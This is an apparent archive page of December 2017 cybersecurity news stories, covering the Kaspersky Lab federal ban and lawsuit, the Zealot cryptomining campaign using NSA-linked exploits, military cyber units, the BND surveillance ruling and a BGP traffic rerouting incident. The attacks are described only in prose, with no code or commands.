- BigBrothers -

Last update 09.10.2017 13:51:26

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8 



Kaspersky Lab files Lawsuit over DHS Ban of its products and services
19.12.2017 securityaffairs BigBrothers

Kaspersky Lab sues the U.S. Government over product ban, it’s appeal was filed in the U.S. District Court for the District of Columbia.
Last week, the US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

Section 1634 of the bill prohibits the use of security software and services provided by security giant, the ban will start from October 1, 2018.

Below the details of the ban included in the section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

Now the security firm sues the U.S. Government over product ban, it’s appeal was filed in the U.S. District Court for the District of Columbia and targets the DHS’s Binding Operational Directive 17-01.

Kaspersky considers the ban as unconstitutional, according to the company the US Government took the decision to prohibit its products based on reports citing anonymous sources without strong evidence of its involvement in cyber espionage activities.

Kaspersky claims to have offered its support to the DHS for its investigation, but the agency issued the 17-01 directive, banning its security software and services without any warning.

The company sustains the DHS should have given it the opportunity to view the information before the directive was issued.

On the other side, Eugene Kaspersky was invited to testify before Congress in September, but he was unable to travel to the U.S. in time for the hearing due to visa problems.

A second hearing was announced for October, but Kaspersky was not invited to testify.

kaspersky

The decision of the US Government is having a significant impact on the brand reputation with a consequent effect on the sales in almost any sector and any country.

“Through Binding Operational Directive 17-01, DHS has harmed Kaspersky Lab’s reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab.


Eugene Kaspersky

@e_kaspersky
What to do when banned without evidence and the right to be heard? Well, we’re securing our rights by taking this to the courts. Why? We’ve done nothing wrong. https://kas.pr/nj7j
#SecurityWithoutBorders

7:40 PM - Dec 18, 2017
8 8 Replies 81 81 Retweets 114 114 likes
Twitter Ads info and privacy
“Dissuading consumers and businesses in the United States and abroad from using Kaspersky Lab products solely because of its geographic origins and without any credible evidence does not constitute a risk-based approach to cybersecurity and does little to address information security concerns related to government networks,” Eugene Kaspersky added.

The security firm also announced a new transparency initiative that involves giving partners access to source code to exclude the presence of backdoors, it also proposed to pay huge bug bounties for vulnerabilities found in its security solutions.


Kaspersky Sues U.S. Government Over Product Ban
19.12.2017 securityweek BigBrothers
Kaspersky Lab has filed a lawsuit against the U.S. government in response to the decision of the Department of Homeland Security (DHS) to ban the use of the company’s products in federal agencies.

The Russia-based cybersecurity firm’s appeal, filed in the U.S. District Court for the District of Columbia, targets the DHS’s Binding Operational Directive 17-01, which the agency issued in mid-September. President Donald Trump reinforced the ban last week when he signed the National Defense Authorization Act for FY2018.

Kaspersky says the ban is unconstitutional as it infringes the company’s due process rights. Kaspersky believes the DHS should have given it the opportunity to view the information and contest it before the directive was issued.

The company’s lawsuit also alleges that the decision to prohibit its products in federal agencies is largely based on rumors and media reports citing anonymous sources. While some believe the U.S. government may have actual evidence that Kaspersky Lab has been aiding Russia’s espionage efforts, no proof has been presented and even some officials appear to base their accusations on news reports.

Kaspersky claims that it voluntarily reached out to the DHS in July and offered to assist with any investigation into the company and its products. While the agency seemed to appreciate the offer and promised to get it touch, it did not do so, and instead it issued the 17-01 directive, banning the company’s software and services without warning.

The security firm says that while only a relatively small percentage of its revenue comes from the U.S. government, the DHS’s actions have had a negative impact on sales in other sectors, in both the United States and other countries.

“Through Binding Operational Directive 17-01, DHS has harmed Kaspersky Lab’s reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab.

A majority of the accusations against Kaspersky Lab stem from its founder’s former ties to Russian intelligence. However, the CEO pointed out that most of the intelligence reports published by the company in the past years targeted Russian-speaking espionage groups.

In response to claims by U.S. officials that Kaspersky’s software is dangerous due to the deep level of access and privileges it requires, the Russian businessman highlighted that these capabilities are present in all security products and it’s unfair to single out his company without any evidence of wrongdoing.

“Dissuading consumers and businesses in the United States and abroad from using Kaspersky Lab products solely because of its geographic origins and without any credible evidence does not constitute a risk-based approach to cybersecurity and does little to address information security concerns related to government networks,” Eugene Kaspersky said.

Kaspersky has attempted to clear its name by launching a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

Eugene Kaspersky was invited to testify before Congress in September, but he was unable to travel to the U.S. in time for the hearing due to visa problems. A second hearing was announced for October, but the cyber security tycoon was not invited.


Pentagon Hacked in New U.S. Air Force Bug Bounty Program
18.12.2017 securityweek BigBrothers
The Hack the Air Force 2.0 bug bounty program kicked off earlier this month with researchers finding a critical vulnerability that could have been exploited to gain access to a network of the U.S. Department of Defense.

Hack the Air Force 2.0 started on December 9 with a live hacking competition hosted by the HackerOne platform at the WeWork Fulton Center inside the Fulton Center subway station in New York City.

During the event, Mathias Karlsson and Brett Buerhaus demonstrated how malicious actors could have breached an unclassified DoD network by exploiting a vulnerability in the Air Force’s website. They earned $10,650 for their findings, which is the largest single payout coming from any bug bounty program run by the U.S. government.

Seven U.S. Airmen and 25 civilian white hat hackers discovered a total of 55 vulnerabilities during the event, for which they earned $26,883.Hack the Air Force 2.0 bug bounty program

Hack the Air Force 2.0 will run until January 1, 2018 and anyone can apply as long as they are a citizen or a permanent resident of Five Eyes countries, NATO countries, or Sweden. People from 31 countries can take part in the initiative, which makes it the most open government bug bounty program to date. Members of the U.S. military can also participate, but they are not eligible for bounties.

While anyone from these countries can apply, not everyone will be invited to actually take part. The Air Force will invite 600 people, 70 percent of which based on their HackerOne reputation score and the other 30 percent will be selected randomly.

“Hack the Air Force allowed us to look outward and leverage the range of talent in our country and partner nations to secure our defenses,” said Air Force CISO Peter Kim. “We're greatly expanding on the tremendous success of the first challenge by opening up approximately 300 public facing AF websites. The cost-benefit of this partnership is invaluable.”

Hack the Air Force 2.0 was announced following the success of the first Hack the Air Force program, which resulted in more than $130,000 being paid out for over 200 valid vulnerability reports.

Previous DoD bug bounty projects included Hack the Pentagon, which resulted in payouts of roughly $75,000, and Hack the Army, with rewards totaling approximately $100,000. The Pentagon has paid more than $300,000 for over 3,000 flaws discovered in its public-facing systems, but the organization estimates that it saved millions of dollars by running these programs.

Roughly one year ago, the Pentagon announced a vulnerability disclosure policy that aims to provide guidance to researchers on how to disclose security holes found in the organization’s public-facing websites. While no monetary rewards are being offered, the policy provides a legal avenue for reporting flaws.


"Zealot" Apache Struts Attacks Abuses NSA Exploits
18.12.2017 securityweek BigBrothers
A sophisticated multi-staged Apache Struts cyber attack campaign is abusing NSA-linked exploits to target internal networks, researchers from F5 Networks have discovered.

Dubbed Zealot, the highly obfuscated attack uses the EternalBlue and EternalSynergy exploits to target Windows and Linux systems. The newly uncovered campaign employs a PowerShell agent to compromise Windows systems and a Python agent to target Linux/OS X. The scripts appear based on the EmpireProject post-exploitation framework, F5 says.

The attack is targeting servers vulnerable to CVE-2017-5638 (Apache Struts Jakarta Multipart Parser attack) and CVE-2017-9822 (a flaw in the DotNetNuke (DNN) content management system). The main purpose of the campaign is to mine for the Monero cryptocurrency.

“The Zealot campaign aggressively targets both Windows and Linux systems, with the DNN and Struts exploits together. When looking more closely at the unusually high obfuscated payload, we discovered a much more sophisticated multi-staged attack, with lateral movement capabilities, leveraging the leaked NSA-attributed EternalBlue and EternalSynergy exploits,” the researchers reveal.

The attack starts with two HTTP requests, one of which is the notorious Apache Struts exploit via the Content-Type header. Java code is executed to determine the underlying OS on the targeted system.

On Linux, shell commands are executed in the background to download and execute a spearhead bash script that checks whether the machine is already infected and then fetches and runs a crypto-miner file named “mule”.

The Python code checks whether a firewall solution is running and fetches more code from the command and control (C&C) server. The received response is encrypted so that it cannot be detected by typical network inspection devices.

“When sending the request to the C&C, specific User-Agent and Cookie headers are added. This technique means that anyone (like us researchers) who tries to access the C&C from their own browser or a tool won’t get the same response as the malware,” F5 explains.

On Windows systems, the Struts payload runs a PowerShell interpreter in a hidden mode, which in turn executes a base64-encoded script pointing to a file on a different domain. Even more heavily obfuscated, the file is “scv.ps1,” a PowerShell script that downloads the miner and runs it. It can also download the malware as a DLL and inject it into the PowerShell process using reflective DLL injection.

The malicious code also downloads the Python installer and deploys it if Python 2.7 is not present on the targeted Windows system. It then downloads the main Python module to initiate propagation over the internal network.

Two more files are downloaded onto the machine, namely “zealot.zip” and “raven64.exe.” The former includes several Python scripts and libraries, including a script designed to execute the EternalBlue and EternalSynergy exploits, an SMB protocol wrapper, and a series of known Python packages.

The “raven64.exe” file scans the internal network for port 445 and calls the main script to inject three different shellcodes for Windows 7 and Windows 8 systems to exploit EternalSynergy and EternalBlue. After execution, a PowerShell downloads the “scv.ps1” agent, but from a different server.

“The “mule” malware is a cryptocurrency malware mining for the Monero currency. Monero has become the cybercrime currency of choice due to its high anonymity. The amount that was paid for this specific miner address was approximately $8,500. It is not known how much profit the threat actor has overall,” F5 says.

The security researchers also determined that the Zealot attackers used the public EmpireProject, a PowerShell and Python post-exploitation agent.

The second HTTP request observed in this campaign is attempting to exploit the ASP.NET-based content management system DotNetNuke by sending a serialized object via a vulnerable DNNPersonalization cookie. The goal is to obtain arbitrary code execution to run the same PowerShell script delivered via the Apache Struts exploit.

The NSA exploits have been abused in previous campaigns, including NotPetya and WannaCry ransomware, along with the Adylkuzz cryptominer, but Zealot seems to be the first Struts campaign using these exploits.

The new attack also opens “new attack vector doors, automatically delivering malware on internal networks via web application vulnerabilities. The level of sophistication we are currently observing in the Zealot campaign is leading us to believe that the campaign was developed and is being run by threat actors several levels above common bot herders,” F5 concludes.


Zealot Campaign leverages NSA exploits to deliver Monero miners of both Windows and Linux servers
18.12.2017 securityaffairs BigBrothers

Security researchers spotted a sophisticated malware campaign, tracked as Zealot campaign targeting Linux and Windows servers to install Monero miners.
Security researchers from F5 Networks spotted a sophisticated malware campaign, tracked as Zealot campaign (after the name zealot.zip, one of the files dropped on targeted servers), targeting Linux and Windows servers to install Monero cryptocurrency miners.

The campaign was detected by security researchers from F5 Networks, who named it Zealot, after zealot.zip, one of the files dropped on targeted servers.

Hackers are using a wide arsenal of exploits to compromise the servers and install the malware, including the same code used in the Equifax hack

F5 Networks experts observed threat actors scanning the Internet for particular unpatched servers and hack them with two exploits, one for Apache Struts (CVE-2017-5638) and one for the DotNetNuke ASP.NET CMS (CVE-2017-9822).

“F5 threat researchers have discovered a new Apache Struts campaign. This new campaign is a sophisticated multi-staged attack targeting internal networks with the NSA-attributed EternalBlue and EternalSynergy exploits.” states the analysis from F5 Networks.

“We have dubbed the campaign “Zealot” based on the name of the zip file containing the python scripts with the NSA-attributed exploits. As we continue to research this campaign, we will update this publication.”

The exploit for the Struts vulnerability includes malicious code for targeting both Linux and Windows machines at the same time.

Once the hackers infected a Windows machine, they used the EternalBlue and EternalSynergy exploits (both exploits belong to the huge trove of data belonging to the NSA that was leaked by the Shadow Brokers earlier this year) for lateral movements in the target network.

In the last stage of the attack, threat actors would use PowerShell to download and install the Monero miner.

The attack against Linux servers sees attackers using Python scripts that appear to be taken from the EmpireProject post-exploitation framework, to install the same Monero miner.

“Zealot seems to be the first Struts campaign using the NSA exploits to propagate inside internal networks. There were other malware campaigns like NotPetya and WannaCry ransomware, and also Adylkuzz cryptominer launching attacks by directly scanning the Internet for SMBs to exploit with the NSA tools the ShadowBrokers released.” continues the analysis.

“The Zealot campaign, however, seems to be opening new attack vector doors, automatically delivering malware on internal networks via web application vulnerabilities.”

The researchers reported that the amount that was paid for the miner address associated with the Zealot campaign was approximately $8,500 USD, we cannot exclude that crooks also used other Monero wallets.

Zealot campaign
The researchers warned of the possible change for the final-stage payload, they could use the same campaign to deliver ransomware.

Another curiosity emerged from the analysis it that the attackers appear to be big fans of the legendary StarCraft game, in fact, many of the terms and file names used for this campaign are characters of the game (i.e. Zealot, Observer, Overlord, Raven).

“The level of sophistication we are currently observing in the Zealot campaign is leading us to believe that the campaign was developed and is being run by threat actors several levels above common bot herders,” concluded the analysis.


US Military wants cyber warriors along with soldiers on the Battlefield
16.12.2017 securityaffairs BigBrothers

Cyber warriors and soldiers will fight together on the battlefield, the US Army will soon send its cyber experts to support the conventional army.
The news was reported by officials this week, it confirms the strategic importance of Information warfare in the modern military. Cyber warriors will be engaged in the offensive against enemy computer networks.

The Army is investing in cyber capabilities training a new generation of cyber soldiers at a huge center in southern California.

According to Colonel Robert Ryan, who commands a Hawaii-based combat team, while the Army’s mission is generally to “attack and destroy,” the cyber troops will have a different and crucial role in the battle.

“Not everything is destroy. How can I influence by non-kinetic means? How can I reach up and create confusion and gain control?” he explained.

The involvement of cyber troops in military operations is not a novelty, cyber warriors have been integrated for six months in infantry units. Colonel William Hartman of the Army’s Cyber Command added that they will tailor operations according to commanders’ needs.

Hartman didn’t reveal details on cyber operations that will be assigned to cyber soldiers, he only referred that they would be involved in information gathering and intelligence.

In August, President Donald Trump ordered the US Military to create a separate cyber warfare command tasked with cyber warfare operations.

President was thinking of a separate command specialized on electronic and online offensive and defensive operations.

“This new Unified Combatant Command will strengthen our cyberspace operations and create more opportunities to improve our nation’s defense,” Trump said in a statement.

“The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries.”

US cyber warriors have been involved also in counter-terrorism operations, according to the New York Times, CYBERCOM conducted missions to infiltrate and spy on Islamic State group networks. In some cases, the cyber troops alter commanders’ messages so they unwittingly direct ISIS militant to areas likely to be hit by drone or plane strikes.


Germany – Court rules against foreign intelligence agency (BND) surveillance
16.12.2017 securityaffairs BigBrothers

According to a German court, the BND must not store the metadata of international phone calls for the purpose of intelligence analysis.
Just a week ago, we discussed the German Government is preparing a law that will force hardware vendors to include a backdoor in their products and to allow its unit to hack back, now German court rules against foreign intelligence mass communication surveillance.

According to the court, the German foreign intelligence agency (BND) must not store the metadata of international phone calls for the purpose of intelligence analysis.

In April 2016, the German government replaced the head of the external intelligence service after a barrage of criticism over the support offered by the Bundesnachrichtendienst (BND) to the NSA in spying activities on European targets.

In June 2016, the government of Berlin approved new measures to rein in the activities of BND agency after its scandalous support to NSA surveillance activity.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The cyber the spies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.

Germany had reacted with outrage when Snowden leaked documents that demonstrate the surveillance activity, in response, the Chancellor Merkel proposed the establishment of an external watchdog panel of jurists in order to evaluate the activities of the intelligence agency.

“Spying on friends is not on at all” said the Chancellor Merkel at the time.

“Surveillance is a sensitive issue in Germany after the abuses by the Gestapo during the Nazi era and the Stasi in Communist East Germany during the Cold War. Whistleblower Edward Snowden’s revelations about the United States spying on Germany also caused upset.” reports the Reuters Agency.

BND
Source G-Data

In 2015, the Media freedom organization Reporters Without Borders filed a lawsuit against the BND accusing it to have breached the organization’s secrecy and harmed the partners and reporters it worked with.

“The verdict shows that it pays off when human rights organizations defend themselves against the mass storage of data by the BND,” said Christian Mihr, Reporters Without Borders director in Berlin.

The Reuters agency asked about the ruling and the BND said it would wait for the final verdict’s legal justification.


U.S. Military to Send Cyber Soldiers to the Battlefield
14.12.2017 securityweek BigBrothers
The US Army will soon send teams of cyber warriors to the battlefield, officials said Wednesday, as the military increasingly looks to take the offensive against enemy computer networks.

While the Army's mission is generally to "attack and destroy," the cyber troops have a slightly different goal, said Colonel Robert Ryan, who commands a Hawaii-based combat team.

"Not everything is destroy. How can I influence by non-kinetic means? How can I reach up and create confusion and gain control?" he told reporters.

The cyber soldiers have been integrated for six months in infantry units, and will tailor operations according to commanders' needs, said Colonel William Hartman of the Army's Cyber Command.

The Army has for the past three years conducted training for such operations at a huge center in southern California.

Hartman didn't give details on what the cyber troops can achieve, except to say that they would be scooping up information or intercepting planned attacks.

According to the New York Times, CYBERCOM has previously placed "implants" in Islamic State group networks that let experts monitor the group's behavior and ultimately imitate or alter commanders' messages so they unwittingly direct fighters to areas likely to be hit by drone or plane strikes.

Another technique likely being employed is a common type of cyber attack known as a denial of service.

Cyber Command had previously been a subordinate part of the US Strategic Command, but President Donald Trump in August ordered the Pentagon to elevate it to its own command, in a sign of its growing importance.


U.S. Prosecutors Confirm Uber Target of Criminal Probe
14.12.2017 securityweek BigBrothers
A letter made public Wednesday in Waymo's civil suit against Uber over swiped self-driving car secrets confirmed the ride-share service is the target of a US criminal investigation.

The US Attorney's Office in Northern California sent the letter to US Judge William Alsup last month to share some of what they have learned "in the course of a United States' pending criminal investigation," according to a copy of the paperwork obtained by AFP.

Alsup had referred the case to the Justice Department to look into possible criminal charges, but prosecutors remained mum after that. Information shared by the department with Alsup sparked a courtroom furor over the possibility that Uber operated a program to hide nefarious tactics.

It also resulted in the trial being delayed a second time, with the judge setting a new start date of February 5.

The US Attorney's Office said in the missive to Alsup that they interviewed former Uber manager of global intelligence Richard Jacobs, who contended that "employees routinely used non-attributable electronic devices to store and transmit information that they wished to separate from Uber's official systems."

Attorneys representing Uber have repeatedly assured the judge no files taken from Waymo ever touched Uber servers.

Jacobs' attorney laid out his allegations in May in a letter to Uber's associate general counsel, according to the Justice document.

Alsup continues to mull whether it should have been shared during an evidence-gathering phase of the civil case.

The letter signed by Jacobs told of an effort to evade discovery requests, court orders, and government investigations "in violation of state and federal law, as well as ethical rules governing the legal profession."

Techniques used included smartphones or laptop computers that couldn't be traced back to the company, and communicating through encrypted, vanishing message service Wickr, according to the letter and a transcript of courtroom testimony obtained by AFP.

Jacobs testified that he left Uber early this year with a compensation deal valued at $4.5 million.

As part of that agreement with Uber, Jacobs remained a consultant on the payroll.

Uber executives who testified denied any wrongdoing or trail-covering.

The civil case stems from a lawsuit filed by Waymo -- previously known as the Google self-driving car unit -- which claimed former manager Anthony Levandowski took technical data with him when he left to launch a competing venture that went on to become Otto and was later acquired by Uber.

Uber is also a target of investigations and lawsuits over the cover-up of a hack that compromised personal information of 57 million users and drivers.

Uber purportedly paid data thieves $100,000 to destroy the swiped information -- and remained quiet about the breach for a year.

US justice officials are also investigating suspicions of foreign bribery and use of illegal software to spy on competitors or escape scrutiny of regulators.


Traffic to Major Tech Firms Rerouted to Russia
14.12.2017 securityweek BigBrothers
Internet traffic for some of the world’s largest tech firms was briefly rerouted to Russia earlier this week in what appeared to be a Border Gateway Protocol (BGP) attack.

OpenDNS-owned Internet monitoring service BGPmon reported the incident on Tuesday. BGPmon noticed that 80 IP prefixes for organizations such as Google, Microsoft, Apple, Facebook, NTT Communications, Twitch and Riot Games had been announced by a Russian Autonomous System (AS).

It happened twice on Tuesday and each time it only lasted for roughly three minutes. The first event took place between 04:43 and 04:46 UTC, and the second between 07:07 and 07:10 UTC.

Despite being short-lived, BGPmon said the incidents were significant, including due to the fact that the announcements were picked up by several peers and some large ISPs, such as Hurricane Electric and Zayo in the U.S., Telstra in Australia, and NORDUnet, which is a joint project of several Nordic countries.

Another interesting aspect was that all the targeted traffic was associated with high-profile organizations. Experts also pointed out that the Russian AS (AS39523) had not been seen making announcements for several years before this incident.

“What makes this incident suspicious is the prefixes that were affected are all high profile destinations, as well as several more specific prefixes that aren’t normally seen on the Internet. This means that this isn’t a simple leak, but someone is intentionally inserting these more specific prefixes, possibly with the intent the attract traffic,” BGPmon said in a blog post.

“Whatever caused the incident today, it’s another clear example of how easy it is to re-route traffic for 3rd parties, intentionally or by accident. It also is a good reminder for every major ISP to filter customers,” the company added.

Robert Hamilton, director of product marketing at Imperva, said it’s hard to say what the goal was in this specific case considering that the attack was short-lived, but he noted that these types of attacks can be used for various things, “like spoofing websites in order to get visitors to download malicious content or to give up personal details or financial information.”

Chris Morales, head of security analytics at Vectra, a California-based provider of automated threat management solutions, pointed out that users accessing online resources of Google, Apple, Facebook, Microsoft and the other impacted companies trust that their communications are secure because of the use of HTTPS. However, entities that are capable of manipulating the BGP routing protocol to perform man-in-the-middle (MitM) attacks can also manipulate the TLS/SSL encryption and eavesdrop on users.

BGP hijacking

BGP is a protocol used for exchanging routing information between independent networks on the Internet, also known as Autonomous Systems, particularly determining the most efficient route between them. Each AS announces a list of IP address spaces that are known as prefixes, and shares data with its neighbors (peers) to help determine the most efficient path.

Jason Kent, CTO of security consulting firm AsTech, has provided a simple explanation of how it all works and why the “suspicious” event spotted by BGPmon was possible.

“The routers [that peer with these big organizations] all communicate with one another to create the largest routing tables. When a member of a new group of routers announces its routes, to the other members, they all update a table. When a user goes to apple.com, really they are going to one of Apple’s web servers with IP addresses like 105.68.88.209, but the user's ISP has to figure out where that is. So the ISP has this big routing table that says, basically, the way to get to 105.x.y.z is via this peer, and sends it the traffic,” Kent explained.

“The big routing table is kept updated by announcements from other devices. Basically a large community of routers within the Internet all tell one another the places they know how to go,” Kent said. “These announcements and updates are performed over a system [BGP] that is both old and rarely updated. It’s possible to spoof the announcements, in the right way and method, and fool all devices that route traffic, that your controlled device knows where to take it and has the best path.”

BGP hijacking attacks have been conducted for many years and while protections against such threats do exist for ISPs, they can often be bypassed by both cybercriminals and state-sponsored actors.

“For example, governments can use it for restricting internet access to particular websites or filtering content like advertisements that they deem illegal,” explained Joseph Carson, chief security scientist at PAM solutions provider Thycotic. “One of the most well-known cases was when in 2008 Pakistan attempted to block YouTube access and took YouTube down completely and brought their own internet access to its knees.”

“For cybercriminals, it is typically used to replace content from third party website requests like advertisements with infected websites used to distribute malware,” Carson added. “You could also use it to take down websites or even direct web traffic to a country causing a DDOS attack.”


UK Spy Chiefs Peel Back Secrecy -- to Fight Cybercrime
14.12.2017 securityweek BigBrothers
Britain's cyber-spooks are reaching out from behind their veil of secrecy with the aim of cultivating the nation's next generation of high-tech sentries -- a move not without security risks.

With recruiting initiatives levelled at tech-savvy hipsters, start-ups pitching ideas and even Christmas puzzles, the top-secret Government Communications Headquarters (GCHQ) is letting the public in, ever so slightly.

The latest move was this month's "Cyber Accelerator" event at the National Cyber Security Centre (NCSC) -- part of GCHQ -- when investors, journalists and entrepreneurs were offered a rare glimpse behind the scenes.

The Accelerator project connects tech entrepreneurs with GCHQ experts and information, aiming to help the budding companies turn their ideas into ready-for-market cyber-defence products.

The move is the latest in a series of initiatives by the security services to open their doors to young tech wizards -- a subtle effort to recruit the best and brightest as Britain's future cyber-sentries.

GCHQ has previously used stencil graffiti recruitment adverts in the fashionable east London tech hub, and also launched an online puzzle comprising 29 blocks of letters to be decoded by aspiring cyber spies.

During the visit to Accelerator, visitors were whisked up to the National Cyber Security Centre's offices in central London in space-age lifts.

Once arrived, they got to see the latest weapons the entrepreneurs were pitching to private investors as part of the programme.

"Razor wire is there to keep people out, but it does quite a good job of keeping people in. It does create an internal community and we wanted to break out of that," said Chris Ensor, NCSC's deputy director for cyber-skills and growth.

"Accelerator is the natural next step, going out into the wider world."

Nine businesses, who are working with GCHQ for nine months, pitched ideas including defences for crypto-currencies and domestic web-connected products as well as hardware that can wipe the contents of a laptop in case of theft.

Matt Hancock, a junior minister for digital and culture affairs, encouraged investors to dig deep, saying that GCHQ's efforts to engage with the outside world were bearing fruit.

"The small acorn is now beginning to grow into an oak," he said.

- Security risk -

Stressing the urgency of the challenge, NCSC technical director Ian Levy revealed that the agency has dealt with 600 major cyber incidents in its first year, 35 of which were classed as serious.

"They have taught us some things," he said. "Our adversaries are infinitely inventive, they're brilliant."

Alan Woodward, a cybersecurity expert at the University of Surrey, praised Britain for harnessing individual inspiration with the power of government.

"Some of the best ideas have come from one man and his shed, it's the modern version of that.

"They don't always find a natural home in big business or government, this is about trying to give them a leg up," he said.

The event's Silicon Valley spirit and prospects of hard cash are both intended to lure sharp young minds towards working for the nation's defence, he added.

"You can pay someone £30,000 ($40,000, 34,000 euros) a year to go and work at GCHQ and they can basically double that by going to industry. It's hard to get them in and retain them."

- 'Keen to attract young talent' -

"We also know GCHQ is very, very keen to attract young talent," said Anthony Glees, director of the Buckingham University Centre for Security and Intelligence Studies.

"Some of the most succesful hackers have been 16 and 17-year old lads working out of their bedrooms."

However, the necessity of information sharing with private citizens creates potential security "pitfalls", he said, with the leaks by private contractor Edward Snowden while working for the NSA -- GCHQ's US equivalent -- serving as a warning.

GCHQ conduct thorough background checks, but this is "an extremely expensive process", said Glees.

The government must therefore walk a fine line in judging what information to share.

"Exchanging information is always hazardous... but it is necessary," said Glees.

But some things will remain stamped "Top secret", including the location where the entrepreneurs do their work with Britain's cyber-spies.

"It's a physical place, but you can't tell anyone where it is," said the NCSC's Ensor.


Trump signed a bill prohibiting the use of Kaspersky Lab product and services
14.12.2017 securityaffairs BigBrothers

The US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.
Section 1634 of the bill prohibits the use of security software and services provided by security giant Kaspersky Lab, the ban will start from October 1, 2018.

Below the details of the ban included in the section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

Senator Jeanne Shaheen joyed for the news, asserting that the US Government gathered all necessary evidence to motivate such decision.

“The case against Kaspersky is well-documented and deeply concerning. This law is long overdue, and I appreciate the urgency of my bipartisan colleagues on the Senate Armed Services Committee to remove this threat from government systems.” commented Shaheen.

Sen. Shaheen is the author of a letter recently sent to the Trump administration asking that information on Kaspersky Lab be declassified “to raise public awareness regarding the serious threat that the Moscow-based software company poses to the United States’ national security.”

12 Dec

Sen. Jeanne Shaheen

@SenatorShaheen
The defense bill also provides funding for a nationwide health study on the impact of contaminants in drinking water. Seacoast families deserve peace of mind and I’m glad that we can finally move forward with this study. http://bit.ly/2l3833k https://twitter.com/SenatorShaheen/status/940668478704537601 …


Sen. Jeanne Shaheen

@SenatorShaheen
Also included is my amendment to ban the use of Kaspersky Lab software on all government computers. The case against Kaspersky is well-documented & deeply concerning, & I’ll continue to advocate for measures to strengthen our nation’s cybersecurity. http://bit.ly/2BFJ6SG

8:47 PM - Dec 12, 2017
3 3 Replies 15 15 Retweets 32 32 likes
Twitter Ads info and privacy
Kaspersky Lab issued the following statement about the Section 1634.

“Kaspersky Lab continues to have serious concerns about Section 1634 of the National Defense Authorization Act due to its geographic-specific approach to cybersecurity, singling out Kaspersky Lab, which we maintain, does little to mitigate information security risks affecting government networks.” reads the statement issued by Kaspersky.

“Nevertheless, Kaspersky Lab is assessing its options, while continuing to protect its customers from cyber threats, and collaborating globally with the IT security community to fight cybercrime.”

kaspersky lab CEO

In September, the U.S. DHS ordered federal agencies to stop using Kaspersky software and service.

The ban was the response to the concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

Recently the UK’s National Cyber Security Center (NCSC) has also issued a warning regarding the use of Kaspersky software and services by government agencies.

The CEO of the UK National Cyber Security Centre (NCSC), Ciaran Martin, wrote to permanent secretaries regarding the issue of supply chain risk in cloud-based products, including anti-virus (AV) software.

The NCSC is a branch of the UK Government Communications Headquarters (GCHQ), the UK intelligence and security agency.

The letter warns against software made in hostile states, specifically Russia, as the Prime Minister’s Guildhall speech set out, the Government of Moscow is acting against the UK’s national interest in cyberspace.

Kaspersky has repeatedly denied the accusations and it announced the launch of a transparency initiative that involves giving partners access to the source code of its solutions.


Trump Signs Bill Banning Kaspersky Products
13.12.2017 securityweek BigBrothers
U.S. President Donald Trump on Tuesday signed a bill that prohibits the use of Kaspersky Lab products and services in federal agencies.

The National Defense Authorization Act for FY2018 (H.R. 2810) focuses on Department of Defense and Department of Energy programs, authorizes recruitment and retention bonuses for the Armed Forces, and makes changes to national security and foreign affairs programs.

Section 1634 of the bill bans the use of products and services provided by Russia-based cybersecurity firm Kaspersky Lab. The prohibition will go into effect on October 1, 2018.

“No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by (1) Kaspersky Lab (or any successor entity); (2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or (3) any entity of which Kaspersky Lab has majority ownership,” the bill reads.

Senator Jeanne Shaheen, who has spearheaded the campaign against Kaspersky, stated, “The case against Kaspersky is well-documented and deeply concerning. This law is long overdue, and I appreciate the urgency of my bipartisan colleagues on the Senate Armed Services Committee to remove this threat from government systems.”

Sen. Shaheen recently sent a letter to the Trump administration asking that information on Kaspersky Lab be declassified “to raise public awareness regarding the serious threat that the Moscow-based software company poses to the United States’ national security.”

The U.S. Department of Homeland Security (DHS) ordered federal agencies to stop using Kaspersky products back in September, and the bill signed on Tuesday reinforces that order. However, the government has yet to provide any evidence of wrongdoing and even Sen. Shaheen’s statements appear to be largely based on various media reports citing anonymous officials.

One of the most recent media reports involving Kaspersky claimed Russian spies exploited the company’s products to steal sensitive files from an NSA contractor’s computer. The contractor in question has been charged and the cybersecurity firm has shared its side of the story.

The UK's National Cyber Security Center (NCSC) has also issued a warning regarding the use of Kaspersky products by government agencies. While the ban is less explicit compared to the US, it is expected to have a similar effect.

